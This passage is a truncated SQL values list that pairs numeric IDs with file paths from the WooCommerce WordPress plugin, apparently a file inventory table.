p'),(4412,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-object-data-store-interface.php'),(4413,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-data-store-interface.php'),(4414,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-data-store-interface.php'),(4415,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-product-data-store-interface.php'),(4416,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-type-data-store-interface.php'),(4417,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-refund-data-store-interface.php'),(4418,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-payment-token-data-store-interface.php'),(4419,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-data-store-interface.php'),(4420,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-product-variable-data-store-interface.php'),(4421,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-queue-interface.php'),(4422,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-shipping-zone-data-store-interface.php'),(4423,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-webhooks-data-store-interface.php'),(4424,'wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-order.php'),(4425,'wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-payment-token.php'),(4426,'wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-product.php'),(4427,'wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-coupons-controller.php'),(4428,'wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-orders-controller.php'),(4429,'wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-products-controller.php'),(4430,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-authentication.php'),(4431,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-coupons.php'),(4432,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-customers.php'),(4433,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-json-handler.php'),(4434,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-orders.php'),(4435,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-products.php'),(4436,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-reports.php'),(4437,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-resource.php'),(4438,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-server.php'),(4439,'wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-xml-handler.php'),(4440,'wp-content/plugins/woocommerce/includes/legacy/api/v1/interface-wc-api-handler.php'),(4441,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-authentication.php'),(4442,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-coupons.php'),(4443,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-customers.php'),(4444,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-exception.php'),(4445,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-json-handler.php'),(4446,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-orders.php'),(4447,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-products.php'),(4448,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-reports.php'),(4449,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-resource.php'),(4450,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-server.php'),(4451,'wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-webhooks.php'),(4452,'wp-content/plugins/woocommerce/includes/legacy/api/v2/interface-wc-api-handler.php'),(4453,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-authentication.php'),(4454,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-coupons.php'),(4455,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-customers.php'),(4456,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-exception.php'),(4457,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-json-handler.php'),(4458,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-orders.php'),(4459,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-products.php'),(4460,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-reports.php'),(4461,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-resource.php'),(4462,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-server.php'),(4463,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-taxes.php'),(4464,'wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-webhooks.php'),(4465,'wp-content/plugins/woocommerce/includes/legacy/api/v3/interface-wc-api-handler.php'),(4466,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-api.php'),(4467,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-cart.php'),(4468,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-coupon.php'),(4469,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-customer.php'),(4470,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-shipping-zone.php'),(4471,'wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-webhook.php'),(4472,'wp-content/plugins/woocommerce/includes/libraries/Emogrifier/CssConcatenator.php'),(4473,'wp-content/plugins/woocommerce/includes/libraries/Emogrifier/CssInliner.php'),(4474,'wp-content/plugins/woocommerce/includes/libraries/Emogrifier/HtmlProcessor/AbstractHtmlProcessor.php'),(4475,'wp-content/plugins/woocommerce/includes/libraries/Emogrifier/HtmlProcessor/CssToAttributeConverter.php'),(4476,'wp-content/plugins/woocommerce/includes/libraries/Emogrifier/HtmlProcessor/HtmlNormalizer.php'),(4477,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/action-scheduler.php'),(4478,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler.php'),(4479,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Abstract_ListTable.php'),(4480,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Abstract_QueueRunner.php'),(4481,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Action.php'),(4482,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_ActionClaim.php'),(4483,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_ActionFactory.php'),(4484,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_AdminView.php'),(4485,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_CanceledAction.php'),(4486,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Compatibility.php'),(4487,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_CronSchedule.php'),(4488,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_DateTime.php'),(4489,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Exception.php'),(4490,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_FatalErrorMonitor.php'),(4491,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_FinishedAction.php'),(4492,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_IntervalSchedule.php'),(4493,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_InvalidActionException.php'),(4494,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_ListTable.php'),(4495,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_LogEntry.php'),(4496,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Logger.php'),(4497,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_NullAction.php'),(4498,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_NullLogEntry.php'),(4499,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_NullSchedule.php'),(4500,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_QueueCleaner.php'),(4501,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_QueueRunner.php'),(4502,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Schedule.php'),(4503,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_SimpleSchedule.php'),(4504,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Store.php'),(4505,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_TimezoneHelper.php'),(4506,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_Versions.php'),(4507,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_WPCLI_QueueRunner.php'),(4508,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_WPCLI_Scheduler_command.php'),(4509,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wcSystemStatus.php'),(4510,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wpCommentLogger.php'),(4511,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wpPostStore.php'),(4512,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wpPostStore_PostStatusRegistrar.php'),(4513,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wpPostStore_PostTypeRegistrar.php'),(4514,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/classes/ActionScheduler_wpPostStore_TaxonomyRegistrar.php'),(4515,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/deprecated/ActionScheduler_Abstract_QueueRunner_Deprecated.php'),(4516,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/deprecated/ActionScheduler_AdminView_Deprecated.php'),(4517,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/deprecated/functions.php'),(4518,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/functions.php'),(4519,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression.php'),(4520,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_AbstractField.php'),(4521,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_DayOfMonthField.php'),(4522,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_DayOfWeekField.php'),(4523,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_FieldFactory.php'),(4524,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_FieldInterface.php'),(4525,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_HoursField.php'),(4526,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_MinutesField.php'),(4527,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_MonthField.php'),(4528,'wp-content/plugins/woocommerce/includes/libraries/action-scheduler/lib/cron-expression/CronExpression_YearField.php'),(4529,'wp-content/plugins/woocommerce/includes/libraries/class-emogrifier.php'),(4530,'wp-content/plugins/woocommerce/includes/libraries/class-wc-eval-math.php'),(4531,'wp-content/plugins/woocommerce/includes/libraries/geolite2/Reader/Decoder.php'),(4532,'wp-content/plugins/woocommerce/includes/libraries/geolite2/Reader/InvalidDatabaseException.php'),(4533,'wp-content/plugins/woocommerce/includes/libraries/geolite2/Reader/Metadata.php'),(4534,'wp-content/plugins/woocommerce/includes/libraries/geolite2/Reader/Util.php'),(4535,'wp-content/plugins/woocommerce/includes/libraries/geolite2/Reader.php'),(4536,'wp-content/plugins/woocommerce/includes/libraries/wp-async-request.php'),(4537,'wp-content/plugins/woocommerce/includes/libraries/wp-background-process.php'),(4538,'wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-db.php'),(4539,'wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-email.php'),(4540,'wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-file.php'),(4541,'wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-cc.php'),(4542,'wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-echeck.php'),(4543,'wp-content/plugins/woocommerce/includes/queue/class-wc-action-queue.php'),(4544,'wp-content/plugins/woocommerce/includes/queue/class-wc-queue.php'),(4545,'wp-content/plugins/woocommerce/includes/shipping/flat-rate/class-wc-shipping-flat-rate.php'),(4546,'wp-content/plugins/woocommerce/includes/shipping/flat-rate/includes/settings-flat-rate.php'),(4547,'wp-content/plugins/woocommerce/includes/shipping/free-shipping/class-wc-shipping-free-shipping.php'),(4548,'wp-content/plugins/woocommerce/includes/shipping/legacy-flat-rate/class-wc-shipping-legacy-flat-rate.php'),(4549,'wp-content/plugins/woocommerce/includes/shipping/legacy-flat-rate/includes/settings-flat-rate.php'),(4550,'wp-content/plugins/woocommerce/includes/shipping/legacy-free-shipping/class-wc-shipping-legacy-free-shipping.php'),(4551,'wp-content/plugins/woocommerce/includes/shipping/legacy-international-delivery/class-wc-shipping-legacy-international-delivery.php'),(4552,'wp-content/plugins/woocommerce/includes/shipping/legacy-local-delivery/class-wc-shipping-legacy-local-delivery.php'),(4553,'wp-content/plugins/woocommerce/includes/shipping/legacy-local-pickup/class-wc-shipping-legacy-local-pickup.php'),(4554,'wp-content/plugins/woocommerce/includes/shipping/local-pickup/class-wc-shipping-local-pickup.php'),(4555,'wp-content/plugins/woocommerce/includes/shortcodes/class-wc-shortcode-cart.php'),(4556,'wp-content/plugins/woocommerce/includes/shortcodes/class-wc-shortcode-checkout.php'),(4557,'wp-content/plugins/woocommerce/includes/shortcodes/class-wc-shortcode-my-account.php'),(4558,'wp-content/plugins/woocommerce/includes/shortcodes/class-wc-shortcode-order-tracking.php'),(4559,'wp-content/plugins/woocommerce/includes/shortcodes/class-wc-shortcode-products.php'),(4560,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-eleven.php'),(4561,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-fifteen.php'),(4562,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-fourteen.php'),(4563,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-nineteen.php'),(4564,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-seventeen.php'),(4565,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-sixteen.php'),(4566,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-ten.php'),(4567,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-thirteen.php'),(4568,'wp-content/plugins/woocommerce/includes/theme-support/class-wc-twenty-twelve.php'),(4569,'wp-content/plugins/woocommerce/includes/tracks/class-wc-site-tracking.php'),(4570,'wp-content/plugins/woocommerce/includes/tracks/class-wc-tracks-client.php'),(4571,'wp-content/plugins/woocommerce/includes/tracks/class-wc-tracks-event.php'),(4572,'wp-content/plugins/woocommerce/includes/tracks/class-wc-tracks-footer-pixel.php'),(4573,'wp-content/plugins/woocommerce/includes/tracks/class-wc-tracks.php'),(4574,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-admin-setup-wizard-tracking.php'),(4575,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-coupons-tracking.php'),(4576,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-extensions-tracking.php'),(4577,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-importer-tracking.php'),(4578,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-orders-tracking.php'),(4579,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-products-tracking.php'),(4580,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-settings-tracking.php'),(4581,'wp-content/plugins/woocommerce/includes/tracks/events/class-wc-status-tracking.php'),(4582,'wp-content/plugins/woocommerce/includes/walkers/class-product-cat-dropdown-walker.php'),(4583,'wp-content/plugins/woocommerce/includes/walkers/class-product-cat-list-walker.php'),(4584,'wp-content/plugins/woocommerce/includes/walkers/class-wc-product-cat-dropdown-walker.php'),(4585,'wp-content/plugins/woocommerce/includes/walkers/class-wc-product-cat-list-walker.php'),(4586,'wp-content/plugins/woocommerce/includes/wc-account-functions.php'),(4587,'wp-content/plugins/woocommerce/includes/wc-attribute-functions.php'),(4588,'wp-content/plugins/woocommerce/includes/wc-cart-functions.php'),(4589,'wp-content/plugins/woocommerce/includes/wc-conditional-functions.php'),(4590,'wp-content/plugins/woocommerce/includes/wc-core-functions.php'),(4591,'wp-content/plugins/woocommerce/includes/wc-coupon-functions.php'),(4592,'wp-content/plugins/woocommerce/includes/wc-deprecated-functions.php'),(4593,'wp-content/plugins/woocommerce/includes/wc-formatting-functions.php'),(4594,'wp-content/plugins/woocommerce/includes/wc-notice-functions.php'),(4595,'wp-content/plugins/woocommerce/includes/wc-order-functions.php'),(4596,'wp-content/plugins/woocommerce/includes/wc-order-item-functions.php'),(4597,'wp-content/plugins/woocommerce/includes/wc-page-functions.php'),(4598,'wp-content/plugins/woocommerce/includes/wc-product-functions.php'),(4599,'wp-content/plugins/woocommerce/includes/wc-rest-functions.php'),(4600,'wp-content/plugins/woocommerce/includes/wc-stock-functions.php'),(4601,'wp-content/plugins/woocommerce/includes/wc-template-functions.php'),(4602,'wp-content/plugins/woocommerce/includes/wc-template-hooks.php'),(4603,'wp-content/plugins/woocommerce/includes/wc-term-functions.php'),(4604,'wp-content/plugins/woocommerce/includes/wc-update-functions.php'),(4605,'wp-content/plugins/woocommerce/includes/wc-user-functions.php'),(4606,'wp-content/plugins/woocommerce/includes/wc-webhook-functions.php'),(4607,'wp-content/plugins/woocommerce/includes/wc-widget-functions.php'),(4608,'wp-content/plugins/woocommerce/includes/wccom-site/class-wc-wccom-site-installer.php'),(4609,'wp-content/plugins/woocommerce/includes/wccom-site/class-wc-wccom-site.php'),(4610,'wp-content/plugins/woocommerce/includes/wccom-site/rest-api/endpoints/class-wc-rest-wccom-site-installer-controller.php'),(4611,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-cart.php'),(4612,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-layered-nav-filters.php'),(4613,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-layered-nav.php'),(4614,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-price-filter.php'),(4615,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-product-categories.php'),(4616,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-product-search.php'),(4617,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-product-tag-cloud.php'),(4618,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-products.php'),(4619,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-rating-filter.php'),(4620,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-recent-reviews.php'),(4621,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-recently-viewed.php'),(4622,'wp-content/plugins/woocommerce/includes/widgets/class-wc-widget-top-rated-products.php'),(4623,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-category/block.js'),(4624,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-category/index.js'),(4625,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-product/block.js'),(4626,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/featured-product/index.js'),(4627,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/block.js'),(4628,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/handpicked-products/index.js'),(4629,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/block.js'),(4630,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/index.js'),(4631,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.js'),(4632,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/edit.js'),(4633,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/frontend.js'),(4634,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/get-categories.js'),(4635,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/hierarchy.js'),(4636,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/index.js'),(4637,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.js'),(4638,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/index.js'),(4639,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.js'),(4640,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/index.js'),(4641,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/block.js'),(4642,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/index.js'),(4643,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.js'),(4644,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/index.js'),(4645,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.js'),(4646,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/index.js'),(4647,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.js'),(4648,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/index.js'),(4649,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/grid-content-control/index.js'),(4650,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/grid-layout-control/index.js'),(4651,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/checkbox-checked.js'),(4652,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/checkbox-unchecked.js'),(4653,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/folder-star.js'),(4654,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/folder.js'),(4655,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/index.js'),(4656,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/new-releases.js'),(4657,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/radio-selected.js'),(4658,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/radio-unselected.js'),(4659,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/widgets.js'),(4660,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/woo.js'),(4661,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-attribute-control/index.js'),(4662,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-category-control/index.js'),(4663,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-control/index.js'),(4664,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-orderby-control/index.js'),(4665,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/index.js'),(4666,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/test/__snapshots__/index.js.snap'),(4667,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/test/index.js'),(4668,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-tag-control/index.js'),(4669,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/products-control/index.js'),(4670,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/toggle-button-control/index.js'),(4671,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/utils/index.js'),(4672,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/index.js'),(4673,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/deprecations.js'),(4674,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/get-query.js'),(4675,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/get-shortcode.js'),(4676,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/products.js'),(4677,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/shared-attributes.js'),(4678,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/get-query.js'),(4679,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/with-component-id.js'),(4680,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks.js'),(4681,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.js'),(4682,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-product.js'),(4683,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/frontend.js'),(4684,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.js'),(4685,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.js'),(4686,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.js'),(4687,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.js'),(4688,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js'),(4689,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js'),(4690,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.js'),(4691,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.js'),(4692,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js'),(4693,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors.js'),(4694,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets.php'),(4695,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractBlock.php'),(4696,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractDynamicBlock.php'),(4697,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractProductGrid.php'),(4698,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php'),(4699,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php'),(4700,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php'),(4701,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php'),(4702,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php'),(4703,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php'),(4704,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php'),(4705,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php'),(4706,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php'),(4707,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php'),(4708,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductsByAttribute.php'),(4709,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php'),(4710,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php'),(4711,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductAttributeTerms.php'),(4712,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductAttributes.php'),(4713,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductCategories.php'),(4714,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductTags.php'),(4715,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/Products.php'),(4716,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/Variations.php'),(4717,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi.php'),(4718,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/autoload.php'),(4719,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/autoload_packages.php'),(4720,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/automattic/jetpack-autoloader/src/AutoloadGenerator.php'),(4721,'wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/automattic/jetpack-autoloader/src/CustomAutoloaderPlugin.php'),(4722,'wp-co